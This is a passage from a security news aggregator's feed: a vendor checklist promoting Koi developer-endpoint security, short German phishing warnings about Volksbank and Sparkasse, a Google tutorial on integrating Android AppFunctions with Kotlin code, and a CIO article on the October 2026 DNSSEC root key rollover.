		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">In August 2025, 126 malicious packages landed in the npm registry. Even after the community caught the initial wave, 80 of these hidden backdoors remained actively listed.</p>



<p class="wp-block-paragraph">That was enough. Over 86,000 downloads. Malicious code in <a href="https://www.koi.ai/blog/phantomraven-npm-malware-hidden-in-invisible-dependencies" target="_blank" rel="noreferrer noopener">PhantomRaven</a>, packages running in the production systems of Fortune 500 companies worldwide. And throughout the entire window, not a single EDR/XDR alert.</p>



<p class="wp-block-paragraph">This happened because the attack surface has expanded to a layer EDR/XDR was never designed to see: VS Code extensions, local MCP servers, and rogue AI coding assistants that inherit your engineers’ valid credentials to steal data at machine speed.</p>



<p class="wp-block-paragraph">To eliminate this structural vulnerability, Palo Alto Networks acquired Koi, an AI-native developer security product engineered for proactive, precision enforcement. Below we compiled a 2026 CISO checklist you can use to audit your environment and see how Koi automates each defense from day one.</p>



<p class="wp-block-paragraph"><strong>#1. Gain real-time visibility into shadow AI &amp; extensions</strong></p>



<p class="wp-block-paragraph">Your existing asset management tracks binaries and installers, but it cannot see local VS Code extensions, MCP servers, or ad-hoc Python scripts running on developer endpoints. This visibility gap was recently exposed by the <a href="https://www.koi.ai/blog/maliciouscorgi-the-cute-looking-ai-extensions-leaking-code-from-1-5-million-developers" target="_blank" rel="noreferrer noopener">MaliciousCorgi campaign</a>, where two marketplace extensions with 1.5 million combined installs silently harvested every file a developer opened. Neither triggered any detection because they were not binaries, not executables, not anything your inventory was built to flag. To counter this, Koi closes the gap by analyzing what extensions actually do after installation, exposing hidden data-harvesting channels running inside your active workspace.</p>



<p class="wp-block-paragraph"><strong>#2. Distinguish between human and autonomous agent behavior </strong></p>



<p class="wp-block-paragraph">When a rogue AI agent exfiltrates your proprietary source code, it uses a developer’s valid credentials during normal working hours, making the session look entirely legitimate to standard XDR baselines. Moving beyond static permission lists, Koi deploys behavioral profiling within the workspace runtime. By actively intercepting unauthenticated background tasks and blocking unauthorized file-system reads, it stops automated data exfiltration in real time.</p>



<p class="wp-block-paragraph"><strong>#3. Establish guardrails for automated package updates on endpoints</strong></p>



<p class="wp-block-paragraph">Developers prioritize speed, often allowing software packages to auto-update on their endpoints the moment a new version appears. Attackers weaponize this supply chain vulnerability, as seen in the May 2026 Team PCP attack where 3,800 GitHub repositories were compromised in just 36 minutes via poisoned auto-updates. Securing agentic endpoints against these rapid breaches requires behavior-based inspection within the active workspace context. Koi operates at this layer by providing safe deployment buffers that automate version cooldowns, blocking bleeding-edge updates until they are vetted. By continuously auditing process creation within the IDE runtime, Koi instantly drops unauthorized remote connections before malicious payloads can exfiltrate credentials from the endpoint.  </p>



<p class="wp-block-paragraph"><strong>#4. Enforce principle of least privilege for AI agents</strong></p>



<p class="wp-block-paragraph">AI coding assistants inherit the privileges of whoever deployed them. In practice, that means read access to production databases, write access to core repositories, and access to every secret in environment files and configuration directories. To restrict this excessive access, Koi applies dynamic sandboxing directly to AI agent processes at the kernel level. It enforces a strict zero-trust boundary that segregates sensitive workspace vectors, preventing agents from pulling data outside their approved scope without interrupting developer workflows.</p>



<p class="wp-block-paragraph"><strong>#5. Maintain continuous endpoint posture management</strong></p>



<p class="wp-block-paragraph">Signature-based scanning only stops known threats. Sophisticated repository attacks often arrive as functional, high-rated software that carries no known bad signature. Koi’s research into the <a href="https://www.koi.ai/blog/darkspectre-unmasking-the-threat-actor-behind-7-8-million-infected-browsers" target="_blank" rel="noreferrer noopener">DarkSpectre campaign</a> found eight browser extensions, all carrying “featured” badges from Google and Microsoft, installed by over 8 million users, silently harvesting every conversation from ChatGPT, Claude, and Gemini in the background. Koi addresses this by operating upstream: scanning marketplace listings every hour, using LLM-driven code analysis to compare what software promises against what its code does, sandboxing it, and scoring the risk before it ever reaches the endpoint.</p>



<p class="wp-block-paragraph"><strong>Summary</strong></p>



<p class="wp-block-paragraph">Securing the modern enterprise is no longer about patching individual gaps. As AI agents redefine the workforce, Agentic Endpoint Security (AES) is now a strategic imperative for every CISO. By establishing a mandatory control plane for the AI-native workspace, AES ensures that your organization can scale engineering velocity without ever compromising enterprise integrity. </p>



<p class="wp-block-paragraph">Ready to secure the future of your software stack? See how <a href="https://www.paloaltonetworks.com/cortex/agentic-endpoint-security" target="_blank" rel="noreferrer noopener">Koi Agentic Endpoint Security</a> delivers complete visibility, risk scoring, and real-time prevention across every endpoint in your enterprise.</p>



<p class="wp-block-paragraph"></p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[SecureGo Plus: Phishing-Mail zielt auf Volksbank-Kunden]]></title>
<description><![CDATA[Eine gefälschte E-Mail zur SecureGo-Plus-Verifizierung lockt Volksbank-Kunden derzeit auf eine Phishing-Seite. So erkennen Sie die Betrugsmasche.]]></description>
<link>https://tsecurity.de/de/3694301/it-security-nachrichten/securego-plus-phishing-mail-zielt-auf-volksbank-kunden/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694301/it-security-nachrichten/securego-plus-phishing-mail-zielt-auf-volksbank-kunden/</guid>
<pubDate>Sat, 25 Jul 2026 18:53:30 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Eine gefälschte E-Mail zur SecureGo-Plus-Verifizierung lockt Volksbank-Kunden derzeit auf eine Phishing-Seite. So erkennen Sie die Betrugsmasche.]]></content:encoded>
</item>
<item>
<title><![CDATA[ChipTAN-Falle: Wird Ihr Online-Banking gesperrt?]]></title>
<description><![CDATA[Betrüger locken Sparkassen-Kunden derzeit mit einem angeblich wichtigen ChipTAN-Update. Wer auf den Link klickt, landet auf einer Phishing-Seite und riskiert den Verlust seiner Online-Banking-Daten.]]></description>
<link>https://tsecurity.de/de/3694299/it-security-nachrichten/chiptan-falle-wird-ihr-online-banking-gesperrt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694299/it-security-nachrichten/chiptan-falle-wird-ihr-online-banking-gesperrt/</guid>
<pubDate>Sat, 25 Jul 2026 18:53:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Betrüger locken Sparkassen-Kunden derzeit mit einem angeblich wichtigen ChipTAN-Update. Wer auf den Link klickt, landet auf einer Phishing-Seite und riskiert den Verlust seiner Online-Banking-Daten.]]></content:encoded>
</item>
<item>
<title><![CDATA[Build intelligent Android apps: Integrate into Android's intelligence system using AppFunctions]]></title>
<description><![CDATA[Posted by Ben Weiss, Senior Developer Relations Engineer, Android Developer RelationsWelcome back to the blog post series "Build intelligent Android apps" where we take a basic Android app and transform it into a personalized, intelligent, and agentic experience. In our previous post, we explored...]]></description>
<link>https://tsecurity.de/de/3693499/android-tipps/build-intelligent-android-apps-integrate-into-androids-intelligence-system-using-appfunctions/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693499/android-tipps/build-intelligent-android-apps-integrate-into-androids-intelligence-system-using-appfunctions/</guid>
<pubDate>Sat, 25 Jul 2026 10:15:27 +0200</pubDate>
<category>🤖 Android Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi961epgT3N_Za_k2-pCJ30tegn7DM-Umh1LWh7Q4NxhryR5H57JB00zKQcek56ccAvEM95i6wyXWWCZZ7486_Gq1ewxPHtsMY13UVsVTmndAvkOJtHPjUXuZ3XW_yBEFtlOr2ocBFIKr0PCRZhIRs67h6bX6zDKihwcxQs8bGbYTqIp5azuBKcX4PNMMY/s2469/AFD%20-%20%5BABL_104%5D%20JetPacker%20AppFunctions_Meta.png"><p></p><p><i>Posted by Ben Weiss, Senior Developer Relations Engineer, Android Developer Relations</i></p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi92OFxAOxVMpResmBcBoUfxzgcMmVOMn3mXQabB9O-xkC7pjYxrvXS7YLTEWLIBstwuDLc0ePCC-Tf7AKq62mgAXjSYg9-VUIjKvokK6BhGHqPDSXCTQowbpj40plsP3V3Ju3ck4gzNdJmGQ6C1-twuob2UnPu7oY9B_oSwnYSkaif7lSEMwFnStzWknM/s8583/AFD%20-%20%5BABL_104%5D%20JetPacker%20AppFunctions_Blog.png"><img border="0" data-original-height="2601" data-original-width="8583" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi92OFxAOxVMpResmBcBoUfxzgcMmVOMn3mXQabB9O-xkC7pjYxrvXS7YLTEWLIBstwuDLc0ePCC-Tf7AKq62mgAXjSYg9-VUIjKvokK6BhGHqPDSXCTQowbpj40plsP3V3Ju3ck4gzNdJmGQ6C1-twuob2UnPu7oY9B_oSwnYSkaif7lSEMwFnStzWknM/s1600/AFD%20-%20%5BABL_104%5D%20JetPacker%20AppFunctions_Blog.png"></a></div><br><p><br></p><p>Welcome back to the blog post series "<a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-introduction-jetpack.html" target="_blank">Build intelligent Android apps</a>" where we take a basic Android app and transform it into a personalized, intelligent, and agentic experience. In our <a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-cloud-hybrid-inference.html">previous post</a>, we explored how to leverage Firebase AI Logic to build cloud-hosted and hybrid AI features.</p>Traditional mobile UIs excel at focused, hands-on tasks, and the Android intelligence system is introducing complementary features to make complex, multi-step actions even easier. By supplementing traditional user interfaces, AppFunctions provide a powerful new entry point: A privileged agent on the device can access app features in the background. This can be particularly helpful when users are driving, walking or otherwise multitasking. 

<p>In this article, we'll show you how we designed and integrated these capabilities into our travel planning app, <a href="https://github.com/android/ai-samples/tree/main/jetpacker">JetPacker</a>, using Android AppFunctions. We'll explore the rationale behind our feature choices, discuss the specialized tooling we used to accelerate development, and dive into the code that makes it all work.</p>

<h2>Designing AI-ready features: making choices that matter for your users</h2>

<p>To select which features to provide to the intelligence system, we looked for tasks where a voice or text command is objectively faster than tapping through screens. In this side-by-side screen recording you can see this contrast perfectly: on the left, a user tapping through multiple screens to log an expense; on the right, the same task completed instantly in the background via a privileged agent.</p>

<div class="vertical-video-grid">
  <div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIr2ssY2GiOlBmFzcP-91j91VjH9QX_sOP8FcmtirYPyXZmYRzNJmfqI_GT6aXYXye8-ntylv-gTNu1Qlnbx5gHiFn9naHqt7tJOQBA3HpQ5uz8XRdavXh7b3IP3FzJb4SsbC4mClGLUHupDwIeE9Du3PNRQr0SGs2lgHZTdHXnv8TagNBRtoJsbpeE6c/s960/Comp%201.gif"><img border="0" data-original-height="540" data-original-width="960" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIr2ssY2GiOlBmFzcP-91j91VjH9QX_sOP8FcmtirYPyXZmYRzNJmfqI_GT6aXYXye8-ntylv-gTNu1Qlnbx5gHiFn9naHqt7tJOQBA3HpQ5uz8XRdavXh7b3IP3FzJb4SsbC4mClGLUHupDwIeE9Du3PNRQr0SGs2lgHZTdHXnv8TagNBRtoJsbpeE6c/s1600/Comp%201.gif"></a></div><br><div class="vertical-video-wrapper"><br></div>

<p>Our first choice was expense tracking. Logging a coffee expense during a trip usually takes quite a few taps—unlocking the phone, opening the app, finding the active trip, navigating to the expenses tab, tapping the add button, taking a picture of the receipt, and checking the result. By providing the <code>addExpense</code> and <code>getExpenses</code> features as AppFunctions, the system agent handles the heavy lifting. When the user says, "Add a five-dollar coffee expense to my Paris trip," the agent automatically searches for the correct trip ID in the background and inserts the expense, skipping the manual UI flow entirely.</p>

<p>We also prioritized itinerary management. Finding what activity is next on a busy trip itinerary usually requires scrolling through a dense timeline view. By providing <code>getItinerary</code> and <code>addItineraryEvent</code> to the system, the user can simply ask, "What am I doing next in Paris?" and get an immediate answer.</p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRduisOXPFs0o2m-JwtESU1fUEanqH-A0eGt58MUuXs-vgN1af77M-j3ETdegzulBq-3TClrDvhO2K_8q4ep8xAlnW1y5T09ZxxHyZmTRtftA9DOmIk7ykfM_JihQ2c2fcUbEA-jCO1sgW2JnxN9qtB8IS58lbQoaIk4cPJPuPQavZNUoW2rNKo9r8g9M/s960/Comp%202.gif"><img border="0" data-original-height="540" data-original-width="960" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRduisOXPFs0o2m-JwtESU1fUEanqH-A0eGt58MUuXs-vgN1af77M-j3ETdegzulBq-3TClrDvhO2K_8q4ep8xAlnW1y5T09ZxxHyZmTRtftA9DOmIk7ykfM_JihQ2c2fcUbEA-jCO1sgW2JnxN9qtB8IS58lbQoaIk4cPJPuPQavZNUoW2rNKo9r8g9M/s1600/Comp%202.gif"></a></div><br><p><br></p>
  

<p>Finally, we focused on hands-free note capturing. Typing out reminders or notes while walking down a busy street is difficult and unsafe. Exposing a voice note capability allows the user to say, "The flight was amazing, I saw a beautiful sunset and managed to sleep well," and the privileged agent automatically transcribes and saves it directly into the travel database <span face="Roboto, sans-serif"> using the </span><span>addVoiceNote</span><span face="Roboto, sans-serif"> AppFunction.</span></p>

<h2>Android MCP powered by AppFunctions</h2>This entire experience is built on Android MCP. Under this design, the app acts as a local MCP server. Rather than remote APIs, you provide your app features directly to the on-device intelligence system.<br><br><a href="https://d.android.com/ai/appfunctions">Android AppFunctions</a> is the API that brings this concept to life. It reads annotated Kotlin functions and compiles them into type-safe, sandboxed tool definitions that the privileged agent can discover and invoke locally on the device.<div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjypEvh8lAK1myAWpnG4A0TtdIaTxP69t7g9croAJSUZ2Od6AEkhwMusN3CvdGohdvYzoh1UaCxCHb22oJzCD_4B2K8vfQzcyAIaTl8lk3TCR9T0SoMHjjaDk4GMxxPazeCfT0aF7rifm7-LAvcMhyphenhyphenryDJpOPYon7jiISKB2sMLzAwHDuKFxIv16sDXjrM/s2500/Android%20MCP%20diagram.png"><img border="0" data-original-height="1406" data-original-width="2500" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjypEvh8lAK1myAWpnG4A0TtdIaTxP69t7g9croAJSUZ2Od6AEkhwMusN3CvdGohdvYzoh1UaCxCHb22oJzCD_4B2K8vfQzcyAIaTl8lk3TCR9T0SoMHjjaDk4GMxxPazeCfT0aF7rifm7-LAvcMhyphenhyphenryDJpOPYon7jiISKB2sMLzAwHDuKFxIv16sDXjrM/s1600/Android%20MCP%20diagram.png"></a></div><br><p><br></p>

<p><br></p><p><br></p><p><br></p><p><br></p><p><br></p><i><div><i>Diagram highlighting our apps, the android platform, and system agents coordinate AppFunctions.</i></div></i><p>Under the Android MCP model, your app acts as a local MCP server that exposes structured tools, while the Android platform serves as the central tool registry. On the MCP client side, agent apps are registered with the intelligence system after being granted system-privileged permissions to access the registry.</p>

<p>When a user interacts with a registered agent, its LLM determines if the request can be handled by an AppFunction, queries the platform's metadata, and executes the appropriate registered functions in the background. This local MCP client-server design gives you full control: you choose exactly which features are accessible to the agent, keeping the rest of your app's data private.</p>

<h2>How we accelerated development with Android skills</h2>

To streamline the integration process, we leveraged the <a href="https://github.com/android/skills/tree/main/device-ai/appfunctions">AppFunctions development skill</a>. The AppFunctions development skill is a complete development companion. It guided us through the entire lifecycle: mapping Kotlin data classes to serialize parameters, generating the necessary <code>Service</code> entry points, refining our <code>KDoc</code> documentation to ensure the LLM understands parameter boundaries, and setting up automated testing using ADB.

<h2>Providing app features to the intelligence system</h2>

<p>Enough with the theory, let's dive into the implementation.</p>

<h4>Configuration and dependency setup</h4>

<p>We begin by adding the AppFunctions dependencies. One for the API and one for the Kotlin Symbol Processing compiler.</p>

<pre><code>implementation("androidx.appfunctions:appfunctions:1.0.0-alpha10")
ksp("androidx.appfunctions:appfunctions-compiler:1.0.0-alpha10")</code></pre>

<h4>Modeling custom data types</h4>

<p>Any custom object exchanged with the agent must be annotated with <code>@AppFunctionSerializable</code>. In our <a href="https://github.com/android/ai-samples/tree/main/jetpacker/android/feature/appfunctions/src/main/java/com/example/jetpacker/feature/appfunctions/TripSerializable.kt">TripSerializable.kt</a> file, we define our trip data model:</p>

<pre><code>@AppFunctionSerializable(isDescribedByKDoc = true)
data class TripSerializable(
    /** The trip's unique identifier. */
    val id: String,
    /** The trip's title. */
    val title: String,
    /** The trip's destination location. */
    val location: String,
    /** The trip's start date in milliseconds. */
    val startDate: Long,
    /** The trip's end date in milliseconds. */
    val endDate: Long,
    /** A list of participants. */
    val participants: List&lt;String&gt;,
)</code></pre>

<h4>Providing features using the @AppFunction annotation</h4>

<p>Next, the skill wrote the Kotlin functions that perform the database queries and annotate them with <code>@AppFunction</code>. We can view this in searchTrip:</p>

<pre><code>/**
 * Looks for trips based on optional filters like id, title (name), location, and dates.
 *
 * @param id The unique identifier of the trip.
 * @param title The title or name of the trip.
 * @param location The destination location.
 * @param startDate The minimum start date in milliseconds.
 * @param endDate The maximum end date in milliseconds.
 * @return A list of trips matching the filters.
 */
@AppFunction(isDescribedByKDoc = true)
suspend fun searchTrip(
    id: String? = null,
    title: String? = null,
    location: String? = null,
    startDate: Long? = null,
    endDate: Long? = null
): List&lt;TripSerializable&gt; {
    return withContext(Dispatchers.IO) {
    // implementation
}</code></pre>

<p>Since AppFunctions run on the UI thread by default, we use <code>withContext(Dispatchers.IO)</code> to switch to a background dispatcher. Additionally, we refine our KDoc to use clear, imperative verbs and specify parameter constraints. This documentation compiles directly into the tool's schema, which the privileged agent uses to resolve parameters and handle runtime errors.</p>

<h4>The service entry point and Hilt integration</h4>

<p>To register these features with the intelligence system, we create an abstract base class that extends <code>AppFunctionService</code>. We annotate it with <code>@AppFunctionServiceEntryPoint</code>:</p>

<pre><code>@RequiresApi(36)
@AndroidEntryPoint
@AppFunctionServiceEntryPoint(
    serviceName = "JetPackerAppFunctionService",
    appFunctionXmlFileName = "jetpacker_app_function_service"
)
abstract class BaseJetPackerAppFunctionService : AppFunctionService() {
    @Inject internal lateinit var tripDao: TripDao
    // DAOs and database references are injected here...
}</code></pre>

<p>During compilation, KSP generates the final concrete service subclass, <code>JetPackerAppFunctionService</code>, as declared with the <code>serviceName</code> parameter. We also register <code>app_metadata.xml</code> in the app's manifest. This file provides global operational rules for JetPacker's declared AppFunctions.</p>

<h2>Testing and verifying your AppFunctions</h2>

<p>Once implemented, you should verify that your AppFunctions are registered and working correctly.</p>

<p>Running devices or emulators with Android 17 or newer, you can use ADB commands from your terminal to list and invoke your functions. Running <code>adb shell cmd app_function list-app-functions</code> displays all registered functions for your package. You can then execute a specific function and test its database integration by running <code>adb shell cmd app_function execute-app-function</code> while passing a raw JSON parameters string.</p>

<p>Instead of these ADB commands, you can also use the <a href="https://github.com/android/appfunctions">AppFunctions Testing Agent</a> to inspect your configuration, list and execute AppFunctions, and even see how your AppFunctions behave in a real conversational flow.</p>

<h2>Wrapping it up</h2>

<p>When thinking about app features that can be contributed to the intelligence system using AppFunctions requires a slight shift in how we think about code and documentation. AppFunctions enable you to use this new interaction model for apps, which allows using an agent to access app features..</p>

<p>First, the <a href="https://github.com/android/skills/tree/main/device-ai/appfunctions">AppFunctions development skill</a> is an essential lifecycle tool, helping you discover features, implement and refine AppFunctions for your apps. Second, KDoc comments are a compiled API asset; clear parameter descriptions directly impact the execution accuracy of the system agent. Finally, Android MCP provides local-first execution allowing apps to safely collaborate with AI agents.</p>

<p>Contributing app features through AppFunctions makes your application ready for the intelligence system. Let us know how you are adapting your apps for the agentic era!</p>

<h2>Learn more</h2>

<p>Check out the other parts of this blog post series:<br><b><a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-introduction-jetpack.html">Part 1:</a></b> Introduction of the app and a high-level overview.<br><a href="http://android-developers.googleblog.com/2026/07/android-on-device-inference.html"><b>Part 2:</b></a> On-device intelligence. Deep-dive into ML Kit’s GenAI APIs and Gemini Nano to build privacy-first features like itinerary summarization, receipt parsing, and local audio processing.<br><b><a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-cloud-hybrid-inference.html">Part 3:</a></b> Hybrid and cloud reasoning. Explore how to use Firebase AI Logic to ground LLM answers in real-world data like Google Maps and web context.<br><a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-appfunctions.html"><b>Part 4 (this post!):</b></a> System integration. Integrating with the Android intelligence system using AppFunctions. <br>Part 5 (coming soon): In-app agentic workflows. Extend the app with an end-to-end booking assistant powered by A2UI and ADK.</p>

<p>Interested in more on Android Development? Follow Android Developers on <a href="https://www.youtube.com/@AndroidDevelopers">YouTube</a> or <a href="https://www.linkedin.com/showcase/androiddev/">LinkedIn</a>!</p>

<p>
  All code snippets in this blog post follow the following copyright notice:
</p>
<pre><code>Copyright 2026 Google LLC.
SPDX-License-Identifier: Apache-2.0</code></pre></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CIOs beware: DNS KSK rollover could kick off wave of mysterious outages]]></title>
<description><![CDATA[Predicting an outage is tricky business, but CIOs might want to circle Oct. 11, 2026, through Jan. 11, 2027, for likely trouble of a potentially widespread and puzzling nature.



That’s because a relatively trivial update to DNSSEC on Oct. 11, one that will take full effect by Jan. 11, is likely...]]></description>
<link>https://tsecurity.de/de/3693085/it-nachrichten/cios-beware-dns-ksk-rollover-could-kick-off-wave-of-mysterious-outages/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693085/it-nachrichten/cios-beware-dns-ksk-rollover-could-kick-off-wave-of-mysterious-outages/</guid>
<pubDate>Sat, 25 Jul 2026 06:16:22 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Predicting an outage is tricky business, but CIOs might want to circle Oct. 11, 2026, through Jan. 11, 2027, for likely trouble of a potentially widespread and puzzling nature.</p>



<p class="wp-block-paragraph">That’s because a relatively trivial update to DNSSEC on Oct. 11, one that will take full effect by Jan. 11, is likely to deliver a series of seemingly unrelated system outages. This will come from oceans of dependencies from third-party, shadow, agentic, gen AI, SaaS, homegrown, and legacy apps — among many other quiet executable hiding spots, including virtual environments and containers.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/joshithak/">Sai Joshitha Kathari</a>, senior site reliability engineer at payment card giant Visa, says most enterprises have far more DNS-related exposure than they realize because of these many dependencies.</p>



<p class="wp-block-paragraph">“This has the potential to create real downstream destruction when unresolved failures sit underneath important business functions,” Kathari says. </p>



<p class="wp-block-paragraph">The danger is that so many of these issues are either unknown to IT or handled by a third-party vendor and no one in IT has had reason to ask those vendors about DNS updates. </p>



<p class="wp-block-paragraph">“The risky areas are usually not the obvious managed DNS services. They are the older internal applications, hardcoded resolvers, containerized workloads, sidecar configurations, custom scripts, partner integrations, VM images, stale base images, and service-to-service dependencies that nobody has touched in a long time,” Kathari explains. “These systems can keep working quietly for years, then fail during a DNS or certificate-related change because they bypassed the normal platform standards.”</p>



<p class="wp-block-paragraph">Independent technology analyst <a href="https://www.linkedin.com/in/carmi/">Carmi Levy</a> says that CIOs need to take this event very seriously. </p>



<p class="wp-block-paragraph">“The two-pronged deadline — October 11, 2026, when the new Key Signing Key (KSK) begins signing the root zone, and January 11, 2027, when the old key is retired — should be marked in red on everyone’s calendar, just as December 31, 1999, once was,” Levy says. “Failure to comply could result in websites, critical business applications, and related resources dropping off the face of the Earth once the transition is complete.”</p>



<p class="wp-block-paragraph">Levy adds: “Custom-built code that lives outside conventional support mechanisms may or may not function when the DNS changes go into effect.”</p>



<p class="wp-block-paragraph">The <a href="https://www.icann.org/resources/press-material/release-2026-05-20-en">DNSSEC update itself</a> is straightforward, but it is also the first significant DNSSEC change — specifically a change in the trust anchor — since 2018. </p>



<p class="wp-block-paragraph">The rollout statement noted that “the trust anchor is formally known as the Domain Name System Security Extensions (DNSSEC) root zone Key Signing Key (KSK). The KSK is the cryptographic key at the core of the DNSSEC trust anchor and is used to verify that DNS responses are legitimate and have not been modified in transit.”</p>



<h2 class="wp-block-heading">Expect nearly every enterprise to be impacted</h2>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/kimdavies/">Kim Davies</a>, vice president of IANA Services and president of public technical identifiers at ICANN, says the extent of the impact on enterprises is unknowable, given the nature of shadow IT and other edge cases. </p>



<p class="wp-block-paragraph">But based on the massive number of dependencies both known and unknown in the typical global enterprise, Davies guesses that just about every enterprise will be impacted, to varying degrees. </p>



<p class="wp-block-paragraph">“In highly complex organizations, it is very likely there will be some impact in the corners, in the margins, of the organization,” Davies tells CIO. “DNS is such a core technology that underpins everything.”</p>



<p class="wp-block-paragraph">As the updates propagate, hiccups will materialize, Davies notes. “When the system cannot validate the [DNS] information, it will treat it as suspect and DNS lookups will fail.”</p>



<p class="wp-block-paragraph">Visa’s Kathari says, “Enterprises should expect some secondary DNS-related glitches when major DNSSEC-related changes happen, not necessarily because the core infrastructure teams will ignore the update, but because large environments have many hidden dependency paths.”</p>



<p class="wp-block-paragraph">Making this problem far worse, Kathari notes, is that the glitches will likely initially look like anything other thana DNS glitch. That will force IT staff to waste a vast number of hours chasing causes that ultimately prove to be unrelated to the incidents. </p>



<p class="wp-block-paragraph">“The impact for CIOs is that DNS failures rarely announce themselves as DNS failures. They look like application timeouts, broken logins, failed API calls, queue lag, payment failures, partner connectivity issues, or random regional instability,” Kathari explains. “That makes troubleshooting slower because teams may spend hours looking at the application, database, network, or cloud provider before realizing name resolution is part of the failure path.”</p>



<p class="wp-block-paragraph"><a href="https://greyhoundresearch.com/svg/">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research, agrees that IT will likely spin its wheels chasing the wrong ghosts.</p>



<p class="wp-block-paragraph">“A validation failure rarely stays in its lane. It surfaces as an application error, an API timeout, or a reachability problem, which turns a resolver fault into a coordination failure,” Gogia says. “The application team blames the network, the network team blames the cloud, and the user simply watches work stop.”</p>



<p class="wp-block-paragraph">“Images and templates are the frontier most teams miss,” Gogia adds. “A resolver fixed in summer can be broken again in October the instant a stale golden image is redeployed, because automation no longer lets configuration drift slowly. It restores yesterday’s assumptions at machine speed.”</p>



<p class="wp-block-paragraph">It is widely expected that enterprises will not have any problems executing the change or, more likely, relying on their hyperscalers to properly handle the change. That is the concern. </p>



<p class="wp-block-paragraph">“CIOs are being distracted so much with AI and this is such a deep in the weeds infrastructure issue that this can and willcatch people off-guard,” <a href="https://acceligence.com/talent/profiles/justin-greis/">Justin Greis</a>, CEO of consulting firm Acceligence, tells CIO. “I think we’ll see a meaningful number of enterprise disruptions associated with the DNSSEC trust anchor rollover. Not because the update itself is especially difficult, but because it will expose weaknesses that already exist inside many organizations.”</p>



<p class="wp-block-paragraph">Most enterprise IT operations have had no reason to compile a comprehensive list of all DNS dependencies, but many will be instantly discovered in January. </p>



<h2 class="wp-block-heading">Potentially widespread fallout</h2>



<p class="wp-block-paragraph">A major retailer, for example, might suddenly be unable to connect with FedEx to arrange for deliveries or a hospital may find that test results are no longer being shared with patient portals. It might manifest as an assembly line that halts because an IIoT component can no longer share files with its vendor system or a truck fleet that stops being tracked. </p>



<p class="wp-block-paragraph">“There will almost certainly be systems that fall through the cracks. Some will be legacy applications that rely on outdated DNS configurations that have not been updated in years,” Greis says. “Others will be business-unit-developed tools, contractor-built solutions, embedded systems, manufacturing and industrial systems, or highly customized workloads that operate outside normal IT oversight. These are the types of systems that often surface during infrastructure events like this.”</p>



<p class="wp-block-paragraph">Greis adds that many enterprises will discover in January problems created by their own automation.</p>



<p class="wp-block-paragraph">“Over time, enterprises build layers of processes, templates, and deployment mechanisms that are reused across teams and environments,” Greis notes. “Even after DNS infrastructure is updated correctly, older settings can inadvertently be reintroduced through routine updates and system changes, creating intermittent and difficult-to-diagnose failures.”</p>



<p class="wp-block-paragraph">The good news from this situation is that enterprises are not going to likely lose all DNS access if any of these glitches occur. But that may be of no comfort because even if the disruptions are only with small edge cases, that can still cause massive operational disruptions.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/cricketliu/">Cricket Liu</a>, EVP and chief evangelist at Infoblox, gives the example of a DNS server that responds to factory-floor system queries.</p>



<p class="wp-block-paragraph">“Or let’s say this disrupts [an enterprise’s key] SaaS application. All name resolution may stop and it will show a server failure. It will not deliver a response whenever I look anything up. That’s not subtle at all,” Liu says. “It’s highly likely that companies are going to see some effects.”</p>



<p class="wp-block-paragraph">Back in 2017, the switchover was relatively uneventful, giving some CIOs hope that January 2027 will also be a non-event. But given the technology advancements in the last 10 years and the resulting tidal wave of new enterprise tech dependencies, few are realistically expecting no problems this go around. </p>



<h2 class="wp-block-heading">Impossible to predict what will happen</h2>



<p class="wp-block-paragraph">One of the top network experts on DNS effects in enterprises is <a href="https://blog.apnic.net/author/geoff-huston/">Geoff Huston</a>, chief scientist at the Asia Pacific Network Information Centre (APNIC), the regional Internet Registry administering IP addresses for the Asia Pacific region.</p>



<p class="wp-block-paragraph">Huston says it is difficult to project what will happen in January until it happens.</p>



<p class="wp-block-paragraph">“Just like the last time, we are flying blind with this key roll. Because nothing really terrible happened last time, there is some confidence that nothing terrible will happen this time, but we just can’t tell in advance as there are no good measurement approaches that allow us to peek inside the trust state of recursive resolvers,” he says.</p>



